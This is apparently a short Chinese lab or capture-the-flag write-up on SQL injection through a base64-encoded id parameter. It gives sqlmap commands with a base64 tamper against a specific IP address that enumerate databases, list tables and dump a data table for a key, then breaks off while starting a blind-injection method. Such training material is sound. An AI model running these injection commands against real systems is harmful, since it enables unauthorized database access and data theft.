两种解法
一、利用sqlmap及其tamper模块base64encode使用
1. 看到id后面的参数可能是base64加密后的结果,我们尝试解密,解密结果为1
2.查看当前的系统信息
sqlmap -u "http://219.153.49.228:43371/show.php?id=MQo=" --tamper=base64encode
3.暴库
sqlmap -u "http://219.153.49.228:43371/show.php?id=MQo=" --tamper=base64encode --level=3 --current-db
4.爆表
sqlmap -u "http://219.153.49.228:43371/show.php?id=MQo=" --tables -D test
5.获取key
sqlmap -u "http://219.153.49.228:43371/show.php?id=MQo=" -T data --dump
二、盲注
首先可以看到该URL中存在一个参数“MQ==”,从参数的格式来看是通过了base64进行了加密,那么我们可以对其进行base64解密